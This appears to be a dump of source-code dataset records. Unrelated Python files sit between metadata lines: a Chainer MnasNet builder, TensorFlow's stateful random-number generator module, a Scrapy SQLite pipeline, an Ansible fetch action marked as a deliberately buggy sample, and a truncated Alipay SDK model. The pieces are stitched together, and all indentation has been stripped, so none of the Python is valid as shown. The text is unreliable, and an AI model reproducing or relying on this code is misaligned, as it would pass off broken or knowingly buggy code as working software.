expansion_factors_per_layers = [3, 3, 6, 6, 6, 6]
ksizes_per_layers = [3, 5, 5, 3, 5, 3]
default_kernel_size = 3
from functools import reduce
channels = reduce(lambda x, y: x + [[y[0]] * y[1]] if y[2] != 0 else x[:-1] + [x[-1] + [y[0]] * y[1]],
zip(channels_per_layers, layers, downsample), [])
ksizes = reduce(lambda x, y: x + [[y[0]] + [default_kernel_size] * (y[1] - 1)] if y[2] != 0 else x[:-1] + [
x[-1] + [y[0]] + [default_kernel_size] * (y[1] - 1)], zip(ksizes_per_layers, layers, downsample), [])
expansion_factors = reduce(lambda x, y: x + [[y[0]] * y[1]] if y[2] != 0 else x[:-1] + [x[-1] + [y[0]] * y[1]],
zip(expansion_factors_per_layers, layers, downsample), [])
net = MnasNet(
channels=channels,
init_block_channels=init_block_channels,
final_block_channels=final_block_channels,
ksizes=ksizes,
expansion_factors=expansion_factors,
**kwargs)
if pretrained:
if (model_name is None) or (not model_name):
raise ValueError("Parameter `model_name` should be properly initialized for loading pretrained model.")
from .model_store import get_model_file
load_npz(
file=get_model_file(
model_name=model_name,
local_model_store_dir_path=root),
obj=net)
return net
def mnasnet(**kwargs):
"""
MnasNet model from 'MnasNet: Platform-Aware Neural Architecture Search for Mobile,'
https://arxiv.org/abs/1807.11626.
Parameters:
----------
pretrained : bool, default False
Whether to load the pretrained weights for model.
root : str, default '~/.chainer/models'
Location for keeping the model parameters.
"""
return get_mnasnet(model_name="mnasnet", **kwargs)
def _test():
import numpy as np
import chainer
chainer.global_config.train = False
pretrained = False
models = [
mnasnet,
]
for model in models:
net = model(pretrained=pretrained)
weight_count = net.count_params()
print("m={}, {}".format(model.__name__, weight_count))
assert (model != mnasnet or weight_count == 4308816)
x = np.zeros((1, 3, 224, 224), np.float32)
y = net(x)
assert (y.shape == (1, 1000))
if __name__ == "__main__":
_test()
| [
"[email protected]"
] | |
b302b13d664f632886e2fab3aed08f727a416d21 | 81e706b69c789aff05691c41fa79156942927f82 | /site-packages/tensorflow/python/ops/stateful_random_ops.py | d27c20ca03006d7837c891f41ea4f308918b8e56 | [] | no_license | yoncho/OpenCV-code | f5a1091ef32f3c8c3254ab93e083950b84c4fabd | bda2f793b11462e67c7ab644b342beffb871e3de | refs/heads/master | 2023-03-30T12:01:23.521511 | 2021-04-01T13:45:44 | 2021-04-01T13:45:44 | 291,398,453 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 25,862 | py | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operations for generating random numbers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_stateful_random_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import variables
from tensorflow.python.training.tracking import tracking
from tensorflow.python.util.tf_export import tf_export
# A seed for random ops (stateful and stateless) will always be 1024
# bits, all of which will be sent to the C++ code. The actual C++
# implementation of some algorithms may only use a lower part of the bits.
MAX_INT64 = 2**63 - 1
MIN_INT64 = -(2**63)
UINT64_SPAN = 2**64
# 'Variable' doesn't support uint32 or uint64 yet (due to reasons explained in
# b/111604096 and cl/171681867), so I use signed int here. I choose int64
# instead of int32 here because `VarHandleOp` doesn't support int32 on GPU.
SEED_TYPE = "int64"
SEED_MIN = MIN_INT64
SEED_MAX = MAX_INT64
SEED_UINT_SPAN = UINT64_SPAN
SEED_TYPE_BITS = 64
SEED_BIT_MASK = 0xFFFFFFFFFFFFFFFF
SEED_SIZE = 16 # in units of SEED_TYPE
STATE_TYPE = SEED_TYPE
ALGORITHM_TYPE = STATE_TYPE
RNG_ALG_PHILOX = 1
RNG_ALG_THREEFRY = 2
DEFAULT_ALGORITHM = RNG_ALG_PHILOX
PHILOX_STATE_SIZE = 3
THREEFRY_STATE_SIZE = 2
def non_deterministic_ints(shape, dtype=dtypes.int64):
"""Non-deterministically generates some integers.
This op may use some OS-provided source of non-determinism (e.g. an RNG), so
each execution will give different results.
Args:
shape: the shape of the result.
dtype: (optional) the dtype of the result.
Returns:
a tensor whose element values are non-deterministically chosen.
"""
return gen_stateful_random_ops.non_deterministic_ints(
shape=shape, dtype=dtype)
def _uint_to_int(n):
if n > SEED_MAX:
n = n - SEED_UINT_SPAN
return n
def _make_1d_state(state_size, seed):
"""Makes a 1-D RNG state.
Args:
state_size: an integer.
seed: an integer or 1-D tensor.
Returns:
a 1-D tensor of shape [state_size] and dtype STATE_TYPE.
"""
int_types = (int,) if sys.version_info >= (3, 0) else (int, long)
if isinstance(seed, int_types):
# chop the Python integer (infinite precision) into chunks of SEED_TYPE
ls = []
for _ in range(state_size):
ls.append(seed & SEED_BIT_MASK)
seed >>= SEED_TYPE_BITS
seed = ls
# to avoid overflow error from np.asarray
seed = list(map(_uint_to_int, seed))
seed = np.asarray(seed, dtype=STATE_TYPE)
if len(seed.shape) != 1:
raise ValueError(
"seed should only have one dimension; got shape: %s" % seed.shape)
seed = seed[0:state_size]
# Padding with zeros on the *left* if too short. Padding on the right would
# cause a small seed to be used as the "counter" while the "key" is always
# zero (for counter-based RNG algorithms), because in the current memory
# layout counter is stored before key. In such a situation two RNGs with
# two different small seeds may generate overlapping outputs.
seed_size = seed.shape[0]
if seed_size < state_size:
seed = np.pad(
seed, [(state_size - seed_size, 0)],
mode="constant",
constant_values=0)
assert seed.shape == (state_size,), "Wrong seed.shape: %s" % seed.shape
return seed
def _get_state_size(alg):
if alg == RNG_ALG_PHILOX:
return PHILOX_STATE_SIZE
elif alg == RNG_ALG_THREEFRY:
return THREEFRY_STATE_SIZE
else:
raise ValueError("Unsupported algorithm id: %s" % alg)
def _make_state_from_seed(seed, alg):
return _make_1d_state(_get_state_size(alg), seed)
@tf_export("random.experimental.create_rng_state")
def create_rng_state(seed, algorithm):
"""Creates a RNG state.
Args:
seed: an integer or 1-D tensor.
algorithm: an integer representing the RNG algorithm.
Returns:
a 1-D tensor whose size depends on the algorithm.
"""
return _make_state_from_seed(seed, algorithm)
def _shape_tensor(shape):
"""Convert to an int32 or int64 tensor, defaulting to int64 if empty."""
if isinstance(shape, (tuple, list)) and not shape:
dtype = dtypes.int64
else:
dtype = None
return ops.convert_to_tensor(shape, dtype=dtype, name="shape")
def _convert_to_state_tensor(t):
if isinstance(t, list):
# to avoid out-of-range error from ops.convert_to_tensor
t = list(map(_uint_to_int, t))
return ops.convert_to_tensor(t, dtype=STATE_TYPE)
@tf_export("random.experimental.Generator")
class Generator(tracking.AutoTrackable):
"""Random-number generator.
It uses Variable to manage its internal state, and allows choosing an
Random-Number-Generation (RNG) algorithm.
CPU, GPU and TPU with the same algorithm and seed will generate the same
integer random numbers. Float-point results (such as the output of `normal`)
may have small numerical discrepancies between CPU and GPU.
"""
def __init__(self, copy_from=None, state=None, alg=None):
"""Creates a generator.
The new generator will be initialized by one of the following ways, with
decreasing precedence:
(1) If `copy_from` is not None, the new generator is initialized by copying
information from another generator.
(3) If `state` and `alg` are not None (they must be set together), the new
generator is initialized by a state.
Args:
copy_from: a generator to be copied from.
state: a vector of dtype STATE_TYPE representing the initial state of the
RNG, whose length and semantics are algorithm-specific.
alg: the RNG algorithm. Possible values are RNG_ALG_PHILOX for the
Philox algorithm and RNG_ALG_THREEFRY for the ThreeFry
algorithm (see paper 'Parallel Random Numbers: As Easy as 1, 2, 3'
[https://www.thesalmons.org/john/random123/papers/random123sc11.pdf]).
"""
if copy_from is not None:
# All other arguments should be None
assert (alg or state) is None
self._state_var = variables.Variable(copy_from.state, dtype=STATE_TYPE,
trainable=False)
self._alg_var = copy_from.algorithm
else:
assert alg is not None and state is not None
state = _convert_to_state_tensor(state)
state.shape.assert_is_compatible_with([_get_state_size(alg)])
self._state_var = variables.Variable(state, dtype=STATE_TYPE,
trainable=False)
self._alg_var = alg
@classmethod
def from_state(cls, state, alg):
"""Creates a generator from a state.
See `__init__` for description of `state` and `alg`.
Args:
state: the new state.
alg: the RNG algorithm.
Returns:
The new generator.
"""
return cls(alg=alg, state=state)
@classmethod
def from_seed(cls, seed, alg=None):
"""Creates a generator from a seed.
A seed is a 1024-bit unsigned integer represented either as a Python
integer or a vector of integers. Seeds shorter than 1024-bit will be
padded. The padding, the internal structure of a seed and the way a seed
is converted to a state are all opaque (unspecified). The only semantics
specification of seeds is that two different seeds are likely to produce
two independent generators (but no guarantee).
Args:
seed: the seed for the RNG.
alg: (optional) the RNG algorithm. If None, it will be auto-selected. See
`__init__` for its possible values.
Returns:
The new generator.
"""
if alg is None:
# TODO(wangpeng): more sophisticated algorithm selection
alg = DEFAULT_ALGORITHM
state = create_rng_state(seed, alg)
return cls(state=state, alg=alg)
@classmethod
def from_non_deterministic_state(cls, alg=None):
"""Creates a generator by non-deterministically initializing its state.
The source of the non-determinism will be platform- and time-dependent.
Args:
alg: (optional) the RNG algorithm. If None, it will be auto-selected. See
`__init__` for its possible values.
Returns:
The new generator.
"""
if alg is None:
# TODO(wangpeng): more sophisticated algorithm selection
alg = DEFAULT_ALGORITHM
state = non_deterministic_ints(shape=[_get_state_size(alg)],
dtype=SEED_TYPE)
return cls(state=state, alg=alg)
@classmethod
def from_key_counter(cls, key, counter, alg):
"""Creates a generator from a key and a counter.
This constructor only applies if the algorithm is a counter-based algorithm.
See method `key` for the meaning of "key" and "counter".
Args:
key: the key for the RNG, a scalar of type STATE_TYPE.
counter: a vector of dtype STATE_TYPE representing the initial counter for
the RNG, whose length is algorithm-specific.,
alg: the RNG algorithm. If None, it will be auto-selected. See
`__init__` for its possible values.
Returns:
The new generator.
"""
counter = _convert_to_state_tensor(counter)
key = _convert_to_state_tensor(key)
counter.shape.assert_is_compatible_with([_get_state_size(alg) - 1])
key.shape.assert_is_compatible_with([])
key = array_ops.reshape(key, [1])
state = array_ops.concat([counter, key], 0)
return cls(state=state, alg=alg)
def reset(self, state):
"""Resets the generator by a new state.
See `__init__` for the meaning of "state".
Args:
state: the new state.
"""
state = _convert_to_state_tensor(state)
state.shape.assert_is_compatible_with([_get_state_size(self.algorithm)])
self._state_var.assign(state)
def reset_from_seed(self, seed):
"""Resets the generator by a new seed.
See `from_seed` for the meaning of "seed".
Args:
seed: the new seed.
"""
state = create_rng_state(seed, self.algorithm)
self._state_var.assign(state)
def reset_from_key_counter(self, key, counter):
"""Resets the generator by a new key-counter pair.
See `from_key_counter` for the meaning of "key" and "counter".
Args:
key: the new key.
counter: the new counter.
"""
counter = _convert_to_state_tensor(counter)
key = _convert_to_state_tensor(key)
counter.shape.assert_is_compatible_with(
[_get_state_size(self.algorithm) - 1])
key.shape.assert_is_compatible_with([])
key = array_ops.reshape(key, [1])
state = array_ops.concat([counter, key], 0)
self._state_var.assign(state)
@property
def state(self):
"""The internal state of the RNG."""
return self._state_var
@property
def algorithm(self):
"""The RNG algorithm."""
return self._alg_var
def _standard_normal(self, shape, dtype):
return gen_stateful_random_ops.stateful_standard_normal_v2(
self.state.handle, self.algorithm, shape, dtype=dtype)
@property
def key(self):
"""The 'key' part of the state of a counter-based RNG.
For a counter-base RNG algorithm such as Philox and ThreeFry (as
described in paper 'Parallel Random Numbers: As Easy as 1, 2, 3'
[https://www.thesalmons.org/john/random123/papers/random123sc11.pdf]),
the RNG state consists of two parts: counter and key. The output is
generated via the formula: output=hash(key, counter), i.e. a hashing of
the counter parametrized by the key. Two RNGs with two different keys can
be thought as generating two independent random-number streams (a stream
is formed by increasing the counter).
Returns:
A scalar which is the 'key' part of the state, if the RNG algorithm is
counter-based; otherwise it raises a ValueError.
"""
alg = self.algorithm
if alg == RNG_ALG_PHILOX or alg == RNG_ALG_THREEFRY:
return self._state_var[-1]
else:
raise ValueError("Unsupported algorithm id: %s" % alg)
def skip(self, delta):
"""Advance the counter of a counter-based RNG.
Args:
delta: the amount of advancement. The state of the RNG after
`skip(n)` will be the same as that after `normal([n])`
(or any other distribution). The actual increment added to the
counter is an unspecified implementation detail.
"""
gen_stateful_random_ops.rng_skip(self.state.handle, self.algorithm, delta)
# The following functions return a tensor and as a side effect update
# self._state_var.
def normal(self, shape, mean=0.0, stddev=1.0, dtype=dtypes.float32,
name=None):
"""Outputs random values from a normal distribution.
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output
tensor.
mean: A 0-D Tensor or Python value of type `dtype`. The mean of the normal
distribution.
stddev: A 0-D Tensor or Python value of type `dtype`. The standard
deviation of the normal distribution.
dtype: The type of the output.
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random normal values.
"""
with ops.name_scope(name, "stateful_normal", [shape, mean, stddev]) as name:
shape = _shape_tensor(shape)
mean = ops.convert_to_tensor(mean, dtype=dtype, name="mean")
stddev = ops.convert_to_tensor(stddev, dtype=dtype, name="stddev")
rnd = self._standard_normal(shape, dtype=dtype)
return math_ops.add(rnd * stddev, mean, name=name)
def _truncated_normal(self, shape, dtype):
return gen_stateful_random_ops.stateful_truncated_normal(
self.state.handle, self.algorithm, shape, dtype=dtype)
def truncated_normal(self, shape,
mean=0.0,
stddev=1.0,
dtype=dtypes.float32,
name=None):
"""Outputs random values from a truncated normal distribution.
The generated values follow a normal distribution with specified mean and
standard deviation, except that values whose magnitude is more than
2 standard deviations from the mean are dropped and re-picked.
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output
tensor.
mean: A 0-D Tensor or Python value of type `dtype`. The mean of the
truncated normal distribution.
stddev: A 0-D Tensor or Python value of type `dtype`. The standard
deviation of the normal distribution, before truncation.
dtype: The type of the output.
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random truncated normal
values.
"""
with ops.name_scope(
name, "truncated_normal", [shape, mean, stddev]) as name:
shape_tensor = _shape_tensor(shape)
mean_tensor = ops.convert_to_tensor(mean, dtype=dtype, name="mean")
stddev_tensor = ops.convert_to_tensor(stddev, dtype=dtype, name="stddev")
rnd = self._truncated_normal(shape_tensor, dtype=dtype)
mul = rnd * stddev_tensor
return math_ops.add(mul, mean_tensor, name=name)
def _uniform(self, shape, dtype):
return gen_stateful_random_ops.stateful_uniform(
self.state.handle, self.algorithm, shape=shape, dtype=dtype)
def uniform(self, shape, minval=0, maxval=None,
dtype=dtypes.float32, name=None):
"""Outputs random values from a uniform distribution.
The generated values follow a uniform distribution in the range
`[minval, maxval)`. The lower bound `minval` is included in the range, while
the upper bound `maxval` is excluded. (For float numbers especially
low-precision types like bfloat16, because of
rounding, the result may sometimes include `maxval`.)
For floats, the default range is `[0, 1)`. For ints, at least `maxval` must
be specified explicitly.
In the integer case, the random integers are slightly biased unless
`maxval - minval` is an exact power of two. The bias is small for values of
`maxval - minval` significantly smaller than the range of the output (either
`2**32` or `2**64`).
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output
tensor.
minval: A 0-D Tensor or Python value of type `dtype`. The lower bound on
the range of random values to generate. Defaults to 0.
maxval: A 0-D Tensor or Python value of type `dtype`. The upper bound on
the range of random values to generate. Defaults to 1 if `dtype` is
floating point.
dtype: The type of the output.
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random uniform values.
Raises:
ValueError: If `dtype` is integral and `maxval` is not specified.
"""
dtype = dtypes.as_dtype(dtype)
if maxval is None:
if dtype.is_integer:
raise ValueError("Must specify maxval for integer dtype %r" % dtype)
maxval = 1
with ops.name_scope(name, "stateful_uniform",
[shape, minval, maxval]) as name:
shape = _shape_tensor(shape)
minval = ops.convert_to_tensor(minval, dtype=dtype, name="min")
maxval = ops.convert_to_tensor(maxval, dtype=dtype, name="max")
if dtype.is_integer:
return gen_stateful_random_ops.stateful_uniform_int(
self.state.handle, self.algorithm, shape=shape,
minval=minval, maxval=maxval, name=name)
else:
rnd = self._uniform(shape=shape, dtype=dtype)
return math_ops.add(rnd * (maxval - minval), minval, name=name)
def uniform_full_int(self, shape, dtype=dtypes.uint64, name=None):
"""Uniform distribution on an integer type's entire range.
The other method `uniform` only covers the range [minval, maxval), which
cannot be `dtype`'s full range because `maxval` is of type `dtype`.
Args:
shape: the shape of the output.
dtype: (optional) the integer type, default to uint64.
name: (optional) the name of the node.
Returns:
A tensor of random numbers of the required shape.
"""
dtype = dtypes.as_dtype(dtype)
with ops.name_scope(name, "stateful_uniform_full_int",
[shape]) as name:
shape = _shape_tensor(shape)
return gen_stateful_random_ops.stateful_uniform_full_int(
self.state.handle, self.algorithm, shape=shape,
dtype=dtype, name=name)
def binomial(self, shape, counts, probs, dtype=dtypes.int32, name=None):
"""Outputs random values from a binomial distribution.
The generated values follow a binomial distribution with specified count and
probability of success parameters.
Example:
```python
counts = [10., 20.]
# Probability of success.
probs = [0.8, 0.9]
rng = tf.random.experimental.Generator(seed=234)
binomial_samples = rng.binomial(shape=[2], counts=counts, probs=probs)
```
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output
tensor.
counts: A 0/1-D Tensor or Python value`. The counts of the binomial
distribution.
probs: A 0/1-D Tensor or Python value`. The probability of success for the
binomial distribution.
dtype: The type of the output. Default: tf.int32
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random binomial values.
"""
dtype = dtypes.as_dtype(dtype)
with ops.name_scope(name, "binomial", [shape, counts, probs]) as name:
counts = ops.convert_to_tensor(counts, name="counts")
probs = ops.convert_to_tensor(probs, name="probs")
shape_tensor = _shape_tensor(shape)
return gen_stateful_random_ops.stateful_random_binomial(
self.state.handle,
self.algorithm,
shape=shape_tensor,
counts=counts,
probs=probs,
dtype=dtype,
name=name)
# TODO(wangpeng): implement other distributions
def _make_int64_keys(self, shape=()):
# New independent keys are generated via
# `new_key[i] = hash(old_key, counter+i)`, which is exactly what
# `uniform_full_int(dtype=int64)` does for PhiloxRandom_64_128_128 and
# ThreeFry_64_64_64.
return self.uniform_full_int(shape=shape, dtype=dtypes.int64)
def make_seeds(self, count=1):
"""Generates seeds for stateless random ops.
For example:
```python
seeds = get_global_generator().make_seeds(count=10)
for i in range(10):
seed = seeds[:, i]
numbers = stateless_random_normal(shape=[2, 3], seed=seed)
...
```
Args:
count: the number of seed pairs (note that stateless random ops need a
pair of seeds to invoke).
Returns:
A tensor of shape [2, count] and dtype int64.
"""
alg = self.algorithm
if alg == RNG_ALG_PHILOX or alg == RNG_ALG_THREEFRY:
keys = self._make_int64_keys(shape=[count])
# The two seeds for stateless random ops don't have individual semantics
# and are scrambled together, so setting one to zero is fine.
zeros = array_ops.zeros_like(keys)
return array_ops.stack([keys, zeros])
else:
raise ValueError("Unsupported algorithm id: %s" % alg)
def split(self, count=1):
"""Returns a list of independent `Generator` objects.
Two generators are independent of each other in the sense that the
random-number streams they generate don't have statistically detectable
correlations. The new generators are also independent of the old one.
The old generator's state will be changed (like other random-number
generating methods), so two calls of `split` will return different
new generators.
For example:
```python
gens = get_global_generator().split(count=10)
for gen in gens:
numbers = gen.normal(shape=[2, 3])
# ...
gens2 = get_global_generator().split(count=10)
# gens2 will be different from gens
```
The new generators will be put on the current device (possible different
from the old generator's), for example:
```python
with tf.device("/device:CPU:0"):
gen = Generator(seed=1234) # gen is on CPU
with tf.device("/device:GPU:0"):
gens = gen.split(count=10) # gens are on GPU
```
Args:
count: the number of generators to return.
Returns:
A list (length `count`) of `Generator` objects independent of each other.
The new generators have the same RNG algorithm as the old one.
"""
def _key_to_state(alg, key):
# Padding with zeros on the left. The zeros will be the counter.
return [0] * (_get_state_size(alg) - 1) + [key]
alg = self.algorithm
if alg == RNG_ALG_PHILOX or alg == RNG_ALG_THREEFRY:
keys = self._make_int64_keys(shape=[count])
return [Generator(state=_key_to_state(alg, key), alg=alg)
for key in keys.numpy()]
else:
raise ValueError("Unsupported algorithm id: %s" % alg)
# It's not safe to create TF ops before `init_google` is called, so this is
# initialized to None and get a value the first time `get_global_generator` is
# called.
global_generator = None
@tf_export("random.experimental.get_global_generator")
def get_global_generator():
global global_generator
if global_generator is None:
global_generator = Generator.from_non_deterministic_state()
return global_generator
@tf_export("random.experimental.set_global_generator")
def set_global_generator(generator):
"""Replaces the global generator with another `Generator` object.
This function creates a new Generator object (and the Variable object within),
which does not work well with tf.function because (1) tf.function puts
restrictions on Variable creation thus reset_global_generator can't be freely
used inside tf.function; (2) redirecting a global variable to
a new object is problematic with tf.function because the old object may be
captured by a 'tf.function'ed function and still be used by it.
A 'tf.function'ed function only keeps weak references to variables,
so deleting a variable and then calling that function again may raise an
error, as demonstrated by
random_test.py/RandomTest.testResetGlobalGeneratorBadWithDefun .
Args:
generator: the new `Generator` object.
"""
global global_generator
global_generator = generator
| [
"[email protected]"
] | |
d6e214d0a8d4d12652eee9f7bca72966d79550f4 | f9684c301ce50a6bbb5a75280cd4c70277119f27 | /yelpdetails/yelpdetails/pipelines.py | 55531cab7d87353200bd42058134f3e8878cb6be | [] | no_license | vaibhav89000/yelpdetails | 76149f2feed5cbad98b3e67d3a786223289fc1f4 | b7ce6f739a7f76fbe665e27eb097475775c0c489 | refs/heads/master | 2022-11-25T05:09:56.803075 | 2020-07-06T12:45:54 | 2020-07-06T12:45:54 | 269,969,213 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,379 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html
import sqlite3
class YelpdetailsPipeline(object):
def __init__(self):
self.create_connection()
self.create_table()
def create_connection(self):
self.conn = sqlite3.connect("yelpdetails.db")
self.curr = self.conn.cursor()
def create_table(self):
self.curr.execute("""DROP TABLE IF EXISTS detail""")
self.curr.execute("""create table detail(
Name text,
website_link text,
website_name text,
phone text,
Direction text,
category text,
find text,
near text,
email text,
website text
)""")
# pass
def process_item(self, item, spider):
self.store_db(item)
return item
def store_db(self,item):
self.curr.execute("""insert into detail values (?,?,?,?,?,?,?,?,?,?)""",(
item['Name'],
item['website_link'],
item['website_name'],
item['phone'],
item['Direction'],
item['category'],
item['find'],
item['near'],
item['email'],
item['website']
))
self.conn.commit()
| [
"[email protected]"
] | |
a927ca2edd90ae07adf56559bbfe6b40379ae5cb | f07a42f652f46106dee4749277d41c302e2b7406 | /Data Set/bug-fixing-2/f57f33a8e73d1ac10b3eb6b4333e635c1608bc27-<run>-bug.py | 8fd0e05b5b4b4ec324c3a6a1b7cf88dccfc0d38a | [] | no_license | wsgan001/PyFPattern | e0fe06341cc5d51b3ad0fe29b84098d140ed54d1 | cc347e32745f99c0cd95e79a18ddacc4574d7faa | refs/heads/main | 2023-08-25T23:48:26.112133 | 2021-10-23T14:11:22 | 2021-10-23T14:11:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,670 | py |
def run(self, tmp=None, task_vars=None):
' handler for fetch operations '
if (task_vars is None):
task_vars = dict()
result = super(ActionModule, self).run(tmp, task_vars)
if self._play_context.check_mode:
result['skipped'] = True
result['msg'] = 'check mode not (yet) supported for this module'
return result
source = self._task.args.get('src', None)
dest = self._task.args.get('dest', None)
flat = boolean(self._task.args.get('flat'))
fail_on_missing = boolean(self._task.args.get('fail_on_missing'))
validate_checksum = boolean(self._task.args.get('validate_checksum', self._task.args.get('validate_md5')))
if (('validate_md5' in self._task.args) and ('validate_checksum' in self._task.args)):
result['failed'] = True
result['msg'] = 'validate_checksum and validate_md5 cannot both be specified'
return result
if ((source is None) or (dest is None)):
result['failed'] = True
result['msg'] = 'src and dest are required'
return result
source = self._connection._shell.join_path(source)
source = self._remote_expand_user(source)
remote_checksum = None
if (not self._play_context.become):
remote_checksum = self._remote_checksum(source, all_vars=task_vars)
remote_data = None
if (remote_checksum in ('1', '2', None)):
slurpres = self._execute_module(module_name='slurp', module_args=dict(src=source), task_vars=task_vars, tmp=tmp)
if slurpres.get('failed'):
if ((not fail_on_missing) and (slurpres.get('msg').startswith('file not found') or (remote_checksum == '1'))):
result['msg'] = 'the remote file does not exist, not transferring, ignored'
result['file'] = source
result['changed'] = False
else:
result.update(slurpres)
return result
else:
if (slurpres['encoding'] == 'base64'):
remote_data = base64.b64decode(slurpres['content'])
if (remote_data is not None):
remote_checksum = checksum_s(remote_data)
remote_source = slurpres.get('source')
if (remote_source and (remote_source != source)):
source = remote_source
if (os.path.sep not in self._connection._shell.join_path('a', '')):
source = self._connection._shell._unquote(source)
source_local = source.replace('\\', '/')
else:
source_local = source
dest = os.path.expanduser(dest)
if flat:
if dest.endswith(os.sep):
base = os.path.basename(source_local)
dest = os.path.join(dest, base)
if (not dest.startswith('/')):
dest = self._loader.path_dwim(dest)
else:
if ('inventory_hostname' in task_vars):
target_name = task_vars['inventory_hostname']
else:
target_name = self._play_context.remote_addr
dest = ('%s/%s/%s' % (self._loader.path_dwim(dest), target_name, source_local))
dest = dest.replace('//', '/')
if (remote_checksum in ('0', '1', '2', '3', '4')):
if (remote_checksum == '0'):
result['msg'] = 'unable to calculate the checksum of the remote file'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '1'):
if fail_on_missing:
result['failed'] = True
result['msg'] = 'the remote file does not exist'
result['file'] = source
else:
result['msg'] = 'the remote file does not exist, not transferring, ignored'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '2'):
result['msg'] = 'no read permission on remote file, not transferring, ignored'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '3'):
result['msg'] = 'remote file is a directory, fetch cannot work on directories'
result['file'] = source
result['changed'] = False
elif (remote_checksum == '4'):
result['msg'] = "python isn't present on the system. Unable to compute checksum"
result['file'] = source
result['changed'] = False
return result
local_checksum = checksum(dest)
if (remote_checksum != local_checksum):
makedirs_safe(os.path.dirname(dest))
if (remote_data is None):
self._connection.fetch_file(source, dest)
else:
try:
f = open(to_bytes(dest, errors='strict'), 'w')
f.write(remote_data)
f.close()
except (IOError, OSError) as e:
raise AnsibleError(('Failed to fetch the file: %s' % e))
new_checksum = secure_hash(dest)
try:
new_md5 = md5(dest)
except ValueError:
new_md5 = None
if (validate_checksum and (new_checksum != remote_checksum)):
result.update(dict(failed=True, md5sum=new_md5, msg='checksum mismatch', file=source, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum))
else:
result.update(dict(changed=True, md5sum=new_md5, dest=dest, remote_md5sum=None, checksum=new_checksum, remote_checksum=remote_checksum))
else:
try:
local_md5 = md5(dest)
except ValueError:
local_md5 = None
result.update(dict(changed=False, md5sum=local_md5, file=source, dest=dest, checksum=local_checksum))
return result
| [
"[email protected]"
] | |
d63e37f24e963205d5ab81509b9fb9b544d6dc56 | 0b01cb61a4ae4ae236a354cbfa23064e9057e434 | /alipay/aop/api/domain/InvoiceQueryOpenModel.py | e4a1f2eb763c0a192adc00a055403a1ea79f277d | [
"Apache-2.0"
] | permissive | hipacloud/alipay-sdk-python-all | e4aec2869bf1ea6f7c6fb97ac7cc724be44ecd13 | bdbffbc6d5c7a0a3dd9db69c99443f98aecf907d | refs/heads/master | 2022-11-14T11:12:24.441822 | 2020-07-14T03:12:15 | 2020-07-14T03:12:15 | 277,970,730 | 0 | 0 | Apache-2.0 | 2020-07-08T02:33:15 | 2020-07-08T02:33:14 | null | UTF-8 | Python | false | false | 18,343 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.InvoiceItemQueryOpenModel import InvoiceItemQueryOpenModel
from alipay.aop.api.domain.InvoiceTitleQueryOpenModel import InvoiceTitleQueryOpenModel
class InvoiceQueryOpenModel(object):
def __init__(self):
self._apply_from = None
self._check_code = None
self._checker = None
self._clerk = None
self._einv_code = None
self._einv_no = None
self._ex_tax_amount = None
self._invoice_amount = None
self._invoice_content = None
self._invoice_date = None
self._invoice_id = None
self._invoice_kind = None
self._invoice_memo = None
self._invoice_title = None
self._invoice_type = None
self._m_short_name = None
self._ori_blue_inv_code = None
self._ori_blue_inv_no = None
self._out_apply_id = None
self._out_trade_no = None
self._payee = None
self._payee_address = None
self._payee_bank_account = None
self._payee_bank_name = None
self._payee_register_name = None
self._payee_register_no = None
self._payee_tel = None
self._preview_image_url = None
self._sub_m_short_name = None
self._sum_tax_amount = None
self._trade_date = None
self._user_id = None
@property
def apply_from(self):
return self._apply_from
@apply_from.setter
def apply_from(self, value):
self._apply_from = value
@property
def check_code(self):
return self._check_code
@check_code.setter
def check_code(self, value):
self._check_code = value
@property
def checker(self):
return self._checker
@checker.setter
def checker(self, value):
self._checker = value
@property
def clerk(self):
return self._clerk
@clerk.setter
def clerk(self, value):
self._clerk = value
@property
def einv_code(self):
return self._einv_code
@einv_code.setter
def einv_code(self, value):
self._einv_code = value
@property
def einv_no(self):
return self._einv_no
@einv_no.setter
def einv_no(self, value):
self._einv_no = value
@property
def ex_tax_amount(self):
return self._ex_tax_amount
@ex_tax_amount.setter
def ex_tax_amount(self, value):
self._ex_tax_amount = value
@property
def invoice_amount(self):
return self._invoice_amount
@invoice_amount.setter
def invoice_amount(self, value):
self._invoice_amount = value
@property
def invoice_content(self):
return self._invoice_content
@invoice_content.setter
def invoice_content(self, value):
if isinstance(value, list):
self._invoice_content = list()
for i in value:
if isinstance(i, InvoiceItemQueryOpenModel):
self._invoice_content.append(i)
else:
self._invoice_content.append(InvoiceItemQueryOpenModel.from_alipay_dict(i))
@property
def invoice_date(self):
return self._invoice_date
@invoice_date.setter
def invoice_date(self, value):
self._invoice_date = value
@property
def invoice_id(self):
return self._invoice_id
@invoice_id.setter
def invoice_id(self, value):
